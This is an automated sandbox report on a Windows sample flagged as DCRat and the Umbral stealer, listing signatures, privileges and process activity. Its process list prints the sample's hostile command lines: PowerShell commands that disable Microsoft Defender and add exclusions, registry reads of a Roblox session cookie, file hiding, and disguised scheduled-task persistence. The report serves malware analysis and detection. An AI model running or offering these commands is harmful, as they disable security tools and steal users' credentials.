Malware Analysis Report

2024-10-10 09:54

Sample ID 240627-agllwsvbql
Target 2bdf60ce1391ccc1a829a41c8b531dd5.exe
SHA256 06b5199b7753075d90d3adf5d33adcef9b1c3254d0471a70c282e2cc1391f1b1
Tags
rat dcrat umbral execution infostealer spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06b5199b7753075d90d3adf5d33adcef9b1c3254d0471a70c282e2cc1391f1b1

Threat Level: Known bad

The file 2bdf60ce1391ccc1a829a41c8b531dd5.exe was found to be: Known bad.

Malicious Activity Summary

rat dcrat umbral execution infostealer spyware stealer

Umbral

Process spawned unexpected child process

Detect Umbral payload

DcRat

Umbral family

Dcrat family

DCRat payload

DCRat payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-27 00:11

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-27 00:11

Reported

2024-06-27 00:13

Platform

win7-20240611-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\es-ES\Idle.exe C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Windows\es-ES\6ccacd8608530f C:\Reviewwinbrokernet\bridgefont.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Reviewwinbrokernet\bridgefont.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 2468 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 2468 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 2468 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 2468 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2468 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2468 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2468 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2468 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 2468 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 2468 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 2468 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 2204 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 2204 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 2204 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 2204 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 1736 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\system32\attrib.exe
PID 1736 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\system32\attrib.exe
PID 1736 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\system32\attrib.exe
PID 1736 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 1256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 1256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 1256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 1256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 1256 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 1256 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 1256 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 1736 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 2020 wrote to memory of 2628 N/A C:\Reviewwinbrokernet\bridgefont.exe C:\Windows\System32\cmd.exe
PID 2020 wrote to memory of 2628 N/A C:\Reviewwinbrokernet\bridgefont.exe C:\Windows\System32\cmd.exe
PID 2020 wrote to memory of 2628 N/A C:\Reviewwinbrokernet\bridgefont.exe C:\Windows\System32\cmd.exe
PID 1736 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 2628 wrote to memory of 3052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2628 wrote to memory of 3052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2628 wrote to memory of 3052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1736 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 1736 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe

"C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe"

C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe

"C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\8XChecker.exe

"C:\Users\Admin\AppData\Local\Temp\8XChecker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Reviewwinbrokernet\86Wn4vQvMoqlspy5.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Reviewwinbrokernet\NckHnt5ezZ5X7x5KKKZDHVFQBsAwD.bat" "

C:\Reviewwinbrokernet\bridgefont.exe

"C:\Reviewwinbrokernet\bridgefont.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft Help\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft Help\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefontb" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Application Data\bridgefont.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefont" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\bridgefont.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefontb" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Application Data\bridgefont.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

